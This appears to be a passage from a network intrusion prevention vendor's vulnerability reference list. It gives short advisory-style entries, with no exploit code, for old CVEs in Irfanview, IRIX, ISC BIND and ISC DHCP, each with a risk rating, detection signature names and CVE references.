Irfanview-Jpeg2000-Jp2-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Irfanview's JPEG2000.dll plugin

Risk:

Moderate

First detected in:

sgpkg-ips-1064-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Irfanview

Type:

Malfunction

Description:

There exists a stack buffer overflow vulnerability in Irfanview's JPEG2000.dll plugin.

Situation:

File-JPEG_Irfanview-Jpeg2000-Jp2-Stack-Buffer-Overflow

References:

CVE-2012-0897
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0897

BID-51426
http://www.securityfocus.com/bid/51426

OSVDB-78333
http://www.osvdb.org/78333

IRIX-lpsched-Command-Execution

About this vulnerability:

An IRIX lpsched Command Execution vulnerability

Risk:

High

First detected in:

sgpkg-ips-775-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Irix

Type:

Malfunction

Description:

A vulnerability in lpsched in Irix, versions 6.5.13f and before, which allows remote attackers to execute arbitrary commands via shell metacharacters.

Situation:

Generic_CS-IRIX-lpsched-Command-Execution

References:

CVE-2001-0800
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0800

OSVDB-8573
http://www.osvdb.org/8573

IRIX-Telnetd-Format-String

About this vulnerability:

Irix telnetd format string vulnerability

Risk:

High

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

IRIX

Software:

Generic telnet server

Type:

Format String

Description:

Irix telnet daemon has a format strings vulnerability. This vulnerability is present in unpatched Irix versions of 6.2 through 6.5.8. Successful exploitation of this vulnerability leads to remote root compromise.

Situation:

Telnet_IRIX-RLD-Format-String

References:

CVE-2000-0733
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0733

BID-1572
http://www.securityfocus.com/bid/1572

ISC-Bind-Any-Query-Response-Assertion-Failure-Denial-Of-Service

About this vulnerability:

A vulnerability in ISC BIND

Risk:

Moderate

First detected in:

sgpkg-ips-842-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ISC BIND

Type:

Input Validation

Description:

A crafted DNS response can be used to trigger an assertion failure in ISC BIND. A successful exploitation can cause a denial of service condition.

Situation:

DNS-UDP_ISC-Bind-Any-Query-Response-Assertion-Failure-Denial-Of-Service

References:

CVE-2016-9131
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9131

ISC-Bind-Apl_42.c-Insist-Assertion-Failure-Denial-Of-Service

About this vulnerability:

A vulnerability in ISC BIND

Risk:

Moderate

First detected in:

sgpkg-ips-725-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ISC BIND

Type:

Format String

Description:

A malformed DNS response can be used to exploit an assertion failure vulnerability in the ISC BIND DNS server, leading to a denial of service condition.

Situation:

DNS-UDP_ISC-Bind-Apl_42.c-Insist-Assertion-Failure-Denial-Of-Service

References:

CVE-2015-8704
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8704

ISC-Bind-Buffer.c-Assertion-Failure-Denial-Of-Service

About this vulnerability:

A vulnerability in ISC BIND

Risk:

Moderate

First detected in:

sgpkg-ips-809-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ISC BIND

Type:

Input Validation

Description:

Malicious queries can result in a denial of service condition in ISC BIND.

Situation:

DNS-UDP_ISC-Bind-Buffer.c-Assertion-Failure-Denial-Of-Service

References:

CVE-2016-2776
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2776

ISC-Bind-Buffer.c-Require-Assertion-Failure-Denial-Of-Service

About this vulnerability:

A vulnerability in ISC BIND

Risk:

Moderate

First detected in:

sgpkg-ips-726-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ISC BIND

Type:

Malfunction

Description:

A crafted DNS response can be used to exploit an assertion failure in the ISC BIND DNS server. A successful attempt can lead to a denial of service condition.

Situation:

DNS-UDP_ISC-Bind-Buffer.c-Require-Assertion-Failure-Denial-Of-Service

References:

CVE-2015-8705
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8705

Isc-Bind-Db.c-Assertion-Failure-Denial-Of-Service

About this vulnerability:

A vulnerability in ISC BIND

Risk:

High

First detected in:

sgpkg-ips-723-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ISC BIND

Type:

Input Validation

Description:

A denial-of-service vulnerability has been reported in BIND. The vulnerability is due to improper parsing of incoming responses. Exploiting this vulnerability may lead to a denial-of-service condition.

Situation:

DNS-UDP_Isc-Bind-Db.c-Assertion-Failure-Denial-Of-Service
DNS-UDP_Isc-Bind-Db.c-Assertion-Failure-DoS

References:

CVE-2015-8000
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8000

ISC-Bind-Deny-Answer-Aliases-Assertion-Failure-Denial-Of-Service

About this vulnerability:

A vulnerability in ISC BIND

Risk:

Moderate

First detected in:

sgpkg-ips-1141-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ISC BIND

Type:

Malfunction

Description:

A denial-of-service vulnerability has been reported in ISC BIND9. The vulnerability is due to improper handling of certain responses when BIND is configured to use the deny-answer-aliases feature. A remote attacker could exploit this vulnerability by providing a specific response to a DNAME or ANY query to a vulnerable BIND server. Successful exploitation leads to denial-of-service conditions.

Situation:

DNS-UDP_ISC-Bind-Deny-Answer-Aliases-Assertion-Failure-Denial-Of-Service

References:

CVE-2018-5740
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5740

ISC-Bind-Dname-Response-Processing-Denial-Of-Service

About this vulnerability:

A vulnerability in ISC BIND

Risk:

Moderate

First detected in:

sgpkg-ips-830-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ISC BIND

Type:

Input Validation

Description:

DNS responses containing a crafted DNAME record in the answer section can be used to cause a denial of service condition in ISC BIND.

Situation:

DNS-UDP_ISC-Bind-Dname-Response-Processing-Denial-Of-Service

References:

CVE-2016-8864
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8864

ISC-Bind-Dname-RRSIG-Assertion-Failure-Denial-Of-Service

About this vulnerability:

A vulnerability in ISC BIND

Risk:

Moderate

First detected in:

sgpkg-ips-750-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ISC BIND

Type:

Input Validation

Description:

Improper parsing of DNS RRSIG records can lead to a denial of service condition, which can be triggered by sending a crafted response to a query.

Situation:

DNS-UDP_ISC-Bind-Dname-RRSIG-Assertion-Failure-Denial-Of-Service

References:

CVE-2016-1286
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1286

ISC-Bind-DNS-Cookie-Assertion-Failure-Denial-Of-Service

About this vulnerability:

A vulnerability in ISC BIND

Risk:

Moderate

First detected in:

sgpkg-ips-750-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ISC BIND

Type:

Input Validation

Description:

A denial-of-service vulnerability has been reported in ISC BIND9. The vulnerability is due to improperly processing DNS cookies. A remote attacker could exploit this vulnerabilities by sending a maliciously crafted DNS packet to a target BIND server. Successful exploitation could lead to a denial-of-service condition.

Situation:

DNS-UDP_ISC-Bind-DNS-Cookie-Assertion-Failure-Denial-Of-Service

References:

CVE-2016-2088
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2088

ISC-Bind-DNS-Options-Assertion-Failure-Denial-Of-Service

About this vulnerability:

A vulnerability in ISC BIND

Risk:

Moderate

First detected in:

sgpkg-ips-820-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ISC BIND

Type:

Input Validation

Description:

An assertion failure which can be triggered by sending the server a malicious packet causes a denial of service vulnerability in ISC BIND.

Situation:

DNS-UDP_ISC-Bind-DNS-Options-Assertion-Failure-Denial-Of-Service

References:

CVE-2016-2848
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2848

ISC-BIND-DNS64-And-RPZ-Query-Processing-Denial-Of-Service

About this vulnerability:

A vulnerability in ISC BIND

Risk:

High

First detected in:

sgpkg-ips-859-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ISC BIND

Type:

Input Validation

Description:

There exists a denial of service vulnerability in ISC BIND.

Situation:

DNS-UDP_ISC-BIND-DNS64-And-RPZ-Query-Processing-Denial-Of-Service

References:

CVE-2017-3135
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3135

ISC-BIND-DNSSEC-Key-Parsing-Buffer.c-Denial-Of-Service

About this vulnerability:

A vulnerability in ISC BIND

Risk:

Moderate

First detected in:

sgpkg-ips-690-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ISC BIND

Type:

Input Validation

Description:

ISC BIND parses some DNSSEC responses incorrectly, which can cause a denial of service condition.

Situation:

DNS-UDP_ISC-BIND-DNSSEC-Key-Parsing-Buffer.c-Denial-Of-Service

References:

CVE-2015-5722
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5722

ISC-BIND-DNSSEC-Validation-Denial-Of-Service

About this vulnerability:

A vulnerability in ISC BIND

Risk:

High

First detected in:

sgpkg-ips-677-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

BIND

Type:

Input Validation

Description:

A denial of service vulnerability exists in ISC BIND. The vulnerability is due to an error during DNSSEC validation. A remote attacker can exploit this vulnerability by sending crafted queries under certain circumstances. Successful exploitation will result in a denial of service condition.

Situation:

DNS-UDP_ISC-BIND-DNSSEC-Validation-Denial-Of-Service

References:

CVE-2015-4620
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4620

BID-75588
http://www.securityfocus.com/bid/75588

ISC-BIND-DNSSEC-Validation-Multiple-RRsets-Denial-Of-Service

About this vulnerability:

A vulnerability in ISC BIND

Risk:

Moderate

First detected in:

sgpkg-ips-626-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

BIND

Type:

Malfunction

Description:

A denial of service vulnerability exists in ISC BIND, the DNS server implementation by Internet Systems Consortium. The vulnerability is due to an assertion failure when validating DNS response that contains multiple Resource Record sets. The vulnerability could be exploited by a remote attacker to cause a denial of service condition of the DNS server. In an attack case where the attacker is successful, the vulnerable named process will terminate and exit, creating a denial of service condition. The service needs to be restarted manually to restore the functionality. Users that rely on the affected server to resolve domain names will be unable to use most of Internet based applications.

Situation:

DNS-UDP_ISC-BIND-DNSSEC-Validation-Multiple-RRsets-Denial-Of-Service

References:

CVE-2007-0494
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0494

BID-22231
http://www.securityfocus.com/bid/22231

ISC-BIND-Dynamic-Update-Request-Denial-Of-Service

About this vulnerability:

Denial of service vulnerability in ISC BIND 9

Risk:

High

First detected in:

sgpkg-ips-236-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Any Operating System

Software:

BIND

Type:

Malfunction

Description:

There is a denial of service vulnerability in ISC BIND 9. By sending a crafted dynamic update request to the vulnerable DNS server, a remote unauthenticated attacker can terminate the DNS server process.

Situation:

DNS-TCP_ISC-BIND-Dynamic-Update-Request-Denial-Of-Service
DNS-UDP_ISC-BIND-Dynamic-Update-Request-Denial-Of-Service
DNS-UDP_ISC-BIND-Dynamic-Update-Request-Denial-Of-Service-Exploit

References:

CVE-2009-0696
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0696

BID-35848
http://www.securityfocus.com/bid/35848

OSVDB-56584
http://www.osvdb.org/56584

ISC-Bind-Edns-Option-Processing-Denial-Of-Service

About this vulnerability:

A vulnerability in ISC BIND

Risk:

Moderate

First detected in:

sgpkg-ips-595-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

BIND

Type:

Malfunction

Description:

A denial of service vulnerability exists in ISC BIND. The vulnerability is caused by an assertion failure when processing the EDNS option. A remote attacker may exploit this vulnerability by sending a specially crafted query to the affected servers. Successful exploitation would result in the BIND service terminating unexpectedly.

Situation:

DNS-UDP_ISC-Bind-Edns-Option-Processing-Denial-Of-Service

References:

CVE-2014-3859
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3859

BID-68038
http://www.securityfocus.com/bid/68038

OSVDB-107999
http://www.osvdb.org/107999

ISC-BIND-Invalid-DNS-Key-Record

About this vulnerability:

An invalid KEY resource record in a DNS message was detected

Risk:

Moderate

First detected in:

sgpkg-ips-1315-5242

Last changed:

sgpkg-ips-1408-5242

Platform:

Generic

Software:

ISC BIND

Type:

Input Validation

Description:

BIND9 may assert when processing an invalid KEY or DNSKEY resource record with a modulus of all zeros. It may use uninitialized memory if the modulus length is zero.

Situation:

DNS_ISC-BIND-Empty-RSA-Modulus

References:

CVE-2020-8623
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8623

ISC-Bind-Lwresd-Query-Name-Denial-Of-Service

About this vulnerability:

A vulnerability in ISC BIND

Risk:

Moderate

First detected in:

sgpkg-ips-784-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ISC BIND

Type:

Input Validation

Description:

Improper length field check in the BIND DNS server results in a denial of service vulnerability.

Situation:

Generic_UDP-ISC-Bind-Lwresd-Query-Name-Denial-Of-Service
DNS-UDP_ISC-Bind-Lwresd-Query-Name-Denial-Of-Service

References:

CVE-2016-2775
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2775

Isc-Bind-Openpgpkey61c-Denial-Of-Service

About this vulnerability:

A vulnerability in ISC BIND

Risk:

Critical

First detected in:

sgpkg-ips-694-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ISC BIND

Type:

Input Validation

Description:

There is a denial-of-service vulnerability in ISC BIND. A crafted packet with invalid OpenPGP request length may create a denial of service condition in vulnerable servers.

Situation:

DNS-TCP_Isc-Bind-Openpgpkey61c-Denial-Of-Service
DNS-UDP_Isc-Bind-Openpgpkey61c-Denial-Of-Service

References:

CVE-2015-5986
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5986

ISC-Bind-Query-Response-Missing-RRSIG-Denial-Of-Service

About this vulnerability:

A vulnerability in ISC BIND

Risk:

Moderate

First detected in:

sgpkg-ips-857-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ISC BIND

Type:

Input Validation

Description:

A denial of service condition can be caused in ISC BIND by using a crafted response packet with a missin RRSIG record.

Situation:

DNS-UDP_ISC-Bind-Query-Response-Missing-RRSIG-Denial-Of-Service

References:

CVE-2016-9444
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9444

ISC-BIND-Query_addsoa-Denial-Of-Service

About this vulnerability:

A vulnerability in Internet Systems Consortium (ISC) BIND

Risk:

High

First detected in:

sgpkg-ips-626-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

BIND

Type:

Malfunction

Description:

A denial of service vulnerability exists in ISC BIND, the DNS server implementation by Internet Systems Consortium. The vulnerability is due a failure to handle a certain sequence of recursive DNS queries. Remote attackers can exploit this vulnerability by sending a specially crafted sequence of queries and cause a denial of service condition in the DNS server. In an attack case where the attacker is successful, the vulnerable named process will terminate and exit, creating a denial of service condition. The service needs to be restarted manually to restore the functionality. Users that rely on the affected server to resolve domain names will be unable to use most of Internet based applications.

Situation:

DNS-UDP_ISC-BIND-Query_addsoa-Denial-Of-Service

References:

CVE-2007-2241
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2241

BID-23738
http://www.securityfocus.com/bid/23738

OSVDB-34748
http://www.osvdb.org/34748

ISC-Bind-Rdata-Handling-Assertion-Failure-Denial-Of-Service

About this vulnerability:

A vulnerability in ISC BIND

Risk:

Moderate

First detected in:

sgpkg-ips-537-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

BIND

Type:

Input Validation

Description:

There is a denial of service vulnerability in ISC BIND. The vulnerability is due to an assertion failure that occurs when handling malformed RDATA. A remote attacker could exploit this vulnerability by sending a DNS query response with a specially crafted resource record to an affected server. Successful exploitation would result in the BIND service terminating unexpectedly.

Situation:

DNS-TCP_ISC-Bind-Rdata-Handling-Assertion-Failure-Denial-Of-Service
DNS-UDP_ISC-Bind-Rdata-Handling-Assertion-Failure-Denial-Of-Service

References:

CVE-2013-4854
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4854

BID-61479
http://www.securityfocus.com/bid/61479

OSVDB-95707
http://www.osvdb.org/95707

Isc-Bind-Recursive-Resolver-Resource-Consumption-Denial-Of-Service

About this vulnerability:

A vulnerability in ISC BIND

Risk:

High

First detected in:

sgpkg-ips-632-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ISC BIND

Type:

Malfunction

Description:

A denial of service vulnerability exists in ISC BIND. The vulnerability is due to a design weakness in the way BIND follows DNS delegations. A remote attacker can exploit these vulnerabilities by sending a request to a recursive resolver forcing the resolver to issue a large number (possibly infinite) of queries. A successful attack could lead to resource exhaustion resulting in a denial of service condition.

Situation:

Analyzer_ISC-Bind-Denial-of-Service
DNS-UDP_Isc-Authoritative-Resource-Record

References:

CVE-2014-8500
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8500

BID-71590
http://www.securityfocus.com/bid/71590

OSVDB-115524
http://www.osvdb.org/115524

Isc-Bind-Regular-Expression-Handling-Denial-Of-Service

About this vulnerability:

A vulnerability in ISC BIND

Risk:

High

First detected in:

sgpkg-ips-597-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

BIND

Type:

Resource Starvation

Description:

A denial of service vulnerability exists in ISC BIND. The vulnerability is caused by the way BIND processes certain record types containing regular expressions. A remote attacker may exploit this vulnerability using one of several attack vectors to get the vulnerable BIND server to process a malicious DNS record. A successful attack can lead to excessive memory consumption of the BIND process, eventually leading to a denial-of-service condition.

Situation:

DNS-TCP_Isc-Bind-Regular-Expression-Handling-Denial-Of-Service
DNS-UDP_Isc-Bind-Regular-Expression-Handling-Denial-Of-Service

References:

CVE-2013-2266
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2266

OSVDB-91712
http://www.osvdb.org/91712

ISC-Bind-Rndc-Control-Channel-Assertion-Failure-Denial-Of-Service

About this vulnerability:

A vulnerability in ISC BIND

Risk:

Moderate

First detected in:

sgpkg-ips-755-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ISC BIND

Type:

Input Validation

Description:

The RNDC control message interface in BIND has an input validation vulnerability, which can allow an attacker to get code execution access on the target system.

Situation:

Generic_CS-ISC-Bind-Rndc-Control-Channel-Assertion-Failure-Denial-Of-Service

References:

CVE-2016-1285
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1285

ISC-Bind-Rndc-Control-Channel-Assertion-Failure-Denial-Of-Service-CVE-2017-3138

About this vulnerability:

A vulnerability in ISC BIND

Risk:

Moderate

First detected in:

sgpkg-ips-892-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ISC BIND

Type:

Malfunction

Description:

Improper handling of control commands sent to the RNDC interface of ISC BIND causes an assertion failure, which can be triggered by a remote unauthenticated attacker. A successful exploit can cause a denial of service condition on the target system.

Situation:

Generic_CS-ISC-Bind-Rndc-Control-Channel-Assertion-Failure-DoS

References:

CVE-2017-3138
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3138

Isc-Bind-RPZ-Query-Processing-Denial-Of-Service

About this vulnerability:

A vulnerability in ISC BIND

Risk:

Moderate

First detected in:

sgpkg-ips-958-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ISC BIND

Type:

Input Validation

Description:

A denial-of-service vulnerability has been reported in ISC BIND. An attacker can make a vulnerable target system to go into an infinite loop with multiple crafted packets causing a denial of service condition.

Situation:

DNS-TCP_Empty-TTL-In-Reply
DNS-UDP_Empty-TTL-In-Reply
DNS-UDP_ISC-BIND-Denial-Of-Service-CVE-2017-3140

References:

CVE-2017-3140
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3140

ISC-Bind-RRSIG-Record-Response-Assertion-Failure-Denial-Of-Service

About this vulnerability:

A vulnerability in ISC BIND

Risk:

Moderate

First detected in:

sgpkg-ips-851-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ISC BIND

Type:

Input Validation

Description:

A denial of service condition can be caused by sending a crafted response to ISC BIND to trigger an assertion failure.

Situation:

DNS-UDP_ISC-Bind-RRSIG-Record-Response-Assertion-Failure-Denial-Of-Service

References:

CVE-2016-9147
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9147

ISC-BIND-RRSIG-RRsets-Denial-Of-Service

About this vulnerability:

A vulnerability in ISC BIND

Risk:

Moderate

First detected in:

sgpkg-ips-402-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

BIND

Type:

Malfunction

Description:

A denial of service vulnerability has been reported in ISC BIND. The vulnerability is caused by an off-by-one error which further leads to an assertion failure when processing very large RRSIG RRsets in a negative response. An remote attacker may exploit this vulnerability through querying a targeted caching resolver for non-existent names in the domain served by the attacker controlled server.

Situation:

DNS-TCP_ISC-BIND-RRSIG-RRsets-Denial-Of-Service

References:

CVE-2011-1910
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1910

BID-48007
http://www.securityfocus.com/bid/48007

OSVDB-72540
http://www.osvdb.org/72540

ISC-BIND-TCP-Receive-Buffer-Length-Assertion-DoS

About this vulnerability:

A vulnerability in ISC BIND.

Risk:

High

First detected in:

sgpkg-ips-1370-5242

Last changed:

sgpkg-ips-1370-5242

Platform:

Generic

Software:

ISC BIND

Type:

Malfunction

Description:

A vulnerability in ISC BIND, versions 9.15.6 -> 9.16.5 and 9.17.0 -> 9.17.3, which allows remote attackers to cause a denial of service condition by sending crafted messages to a vulnerable BIND server, due to an incorrectly specified maximum buffer size for handling TCP payload.

Situation:

DNS-TCP_ISC-BIND-TCP-Receive-Buffer-Length-Assertion-DoS

References:

CVE-2020-8620
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8620

ISC-BIND-TKEY-Queries-Input-Validation-DoS

About this vulnerability:

A vulnerability in ISC BIND

Risk:

High

First detected in:

sgpkg-ips-667-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

BIND

Type:

Input Validation

Description:

An unauthenticated remote attacker can send a crafted packet to trigger a REQUIRE assertion failure, causing BIND to exit. Successful attack results in a denial of service condition

Situation:

DNS-TCP_ISC-BIND-TKEY-Queries-Input-Validation-DoS
DNS-TCP_ISC-BIND-TKEY-Queries-Input-Validation-DoS-2
DNS-TCP_ISC-BIND-TKEY-Queries-Input-Validation-DoS-3
DNS-UDP_ISC-BIND-TKEY-Queries-Input-Validation-DoS
DNS-UDP_ISC-BIND-TKEY-Queries-Input-Validation-DoS-2
DNS-UDP_BIND-TKEY-Queries-Input-Validation-DoS-3

References:

CVE-2015-5477
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5477

ISC-BIND-TKEY-SPNEGO-der_Get_Oid-Out-Of-Bounds-Write

About this vulnerability:

A vulnerability in ISC BIND

Risk:

Moderate

First detected in:

sgpkg-ips-1381-5242

Last changed:

sgpkg-ips-1381-5242

Platform:

Generic

Software:

ISC BIND

Type:

Malfunction

Description:

Improper input validation in and around the der_get_oid() function within the SPNEGO component of BIND causes an out of bounds write vulnerability which, when successfully exploited, allows an attacker to cause a denial of service condition or possiby execute code on the target system.

Situation:

DNS-TCP_ISC-BIND-TKEY-SPNEGO-der_Get_Oid-Out-Of-Bounds-Write

References:

CVE-2020-8625
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8625

ISC-BIND-Truncated-Tsig-Record

About this vulnerability:

A truncated Tsig resource record in a DNS message was detected

Risk:

Moderate

First detected in:

sgpkg-ips-1314-5242

Last changed:

sgpkg-ips-1314-5242

Platform:

Generic

Software:

ISC BIND

Type:

Input Validation

Description:

BIND9 may assert when processing a truncated Tsig resource record.

Situation:

DNS-UDP_ISC-Bind-Tsig-Truncation-Denial-Of-Service-1
DNS-UDP_ISC-Bind-Tsig-Truncation-Denial-Of-Service-2

References:

CVE-2020-8622
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8622

ISC-Bind-Tsig-Validation-Denial-Of-Service

About this vulnerability:

A vulnerability in ISC BIND

Risk:

Moderate

First detected in:

sgpkg-ips-1253-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ISC BIND

Type:

Malfunction

Description:

Improper handling of TSIG resource records causes a denial of service vulnerability in ISC BIND.

Situation:

DNS-UDP_ISC-Bind-Tsig-Validation-Denial-Of-Service

References:

CVE-2020-8617
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8617

ISC-BIND-Zero-Length-Rdata-Denial-Of-Service

About this vulnerability:

A vulnerability in ISC BIND

Risk:

Moderate

First detected in:

sgpkg-ips-460-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

BIND

Type:

Input Validation

Description:

There is a denial of service vulnerabilit in ISC BIND. The vulnerability is due to a improper handling of zero-length rdata in unknown record types. In the case of a successful attack the affected server will crash, causing a denial-of-service condition.

Situation:

DNS-TCP_ISC-BIND-Zero-Length-Rdata-Denial-Of-Service
DNS-TCP_ISC-BIND-Zero-Length-Rdata-Denial-Of-Service-2
DNS-UDP_ISC-BIND-Zero-Length-Rdata-Denial-Of-Service

References:

CVE-2012-1667
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1667

BID-53772
http://www.securityfocus.com/bid/53772

OSVDB-82609
http://www.osvdb.org/82609

ISC-DHCP-Buffer-Overflow

About this vulnerability:

An ISC DHCP Buffer Overflow vulnerability

Risk:

Moderate

First detected in:

sgpkg-ips-1005-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ISC DHCP Server

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability in ISC DHCP Server which allows remote attackers to cause a denial of service condition or execute remote code due to a memory access violation when the memory buffer used to hold the log messages is overflowed.

Situation:

BOOTP_CS-ISC-DHCP-Buffer-Overflow

References:

CVE-2004-0460
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0460

ISC-DHCP-dhclient-Pretty_Print_Option-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in ISC DHCP dhclient

Risk:

Moderate

First detected in:

sgpkg-ips-1051-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ISC DHCP dhclient

Type:

Buffer Overflow

Description:

Improper handling of DHCP options causes a stack buffer overflow in the ISC DHCP client. A successful exploit can allow an attacker to execute arbitrary code on the target system.

Situation:

Generic_UDP-ISC-DHCP-dhclient-Pretty_Print_Option-Stack-Buffer-Overflow

References:

CVE-2018-5732
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5732

ISC-DHCP-Server-Dhcpoffer-Client-Identifier-Field-Denial-Of-Service

About this vulnerability:

A vulnerability in Internet Software Consortium DHCP

Risk:

Moderate

First detected in:

sgpkg-ips-436-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ISC DHCP Server

Type:

Input Validation

Description:

There is a denial of service vulnerability in the ISC DHCP server product. The flaw exists due to incorrectly verification on client supplied data in DHCP communication. An attacker may exploit this vulnerability to stop the DHCP service on the target host. Upon processing of a crafted message, the vulnerable DHCP server will shut down thereby creating a denial of service condition. All subsequent connections to the server will not be possible. This will result in the inability of hosts on the affected local network to receive IP addresses during lease renewals.

Situation:

BOOTP_CS-ISC-DHCP-Server-Dhcpoffer-Client-Identifier-Field-Denial-Of-Service
BOOTP_CS-ISC-DHCP-Server-Dhcpoffer-Client-Identifier-Field-Denial-Of-Service-2

References:

CVE-2006-3122
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3122

BID-19348
http://www.securityfocus.com/bid/19348

ISC-DHCP-Server-Dhcpv6-Null-Pointer-Dereference

About this vulnerability:

An ISC DHCP Server DHCPv6 NULL-Pointer Dereference vulnerability

Risk:

High

First detected in:

sgpkg-ips-1005-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ISC DHCP Server

Type:

Null Pointer Dereference

Description:

A vulnerability in ISC DHCP Server which allows remote attackers to cause a denial of service condition by sending malicious packets to the target server due to a NULL pointer dereference in the handling of a DHCPv6 lease structure.

Situation:

Generic_UDP-ISC-DHCP-Server-Dhcpv6-Null-Pointer-Dereference

References:

CVE-2011-4868
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4868

ISC-DHCP-Server-Duid-Handling-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in ISC DHCP Server

Risk:

Moderate

First detected in:

sgpkg-ips-471-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ISC DHCP Server

Type:

Buffer Overflow

Description:

A stack buffer overflow vulnerability exists in ISC DHCP Server. The vulnerability is caused by a lack of bounds checking when parsing the client DUID (DHCP unique identifier). Successful exploitation would result in execution of arbitrary code in the context of the affected service, normally unprivileged. However, since most modern UNIX and Linux systems enable stack protection techniques and address space randomization, the most likely exploitation impact is the termination of the affected service causing a denial-of-service condition.

Situation:

Generic_UDP-ISC-DHCP-Server-Duid-Handling-Stack-Buffer-Overflow

References:

CVE-2012-3570
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3570

OSVDB-84252
http://www.osvdb.org/84252

ISC-DHCP-Server-Omapi-Denial-Of-Service

About this vulnerability:

A vulnerability in ISC DHCP Server

Risk:

Moderate

First detected in:

sgpkg-ips-1141-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ISC DHCP Server

Type:

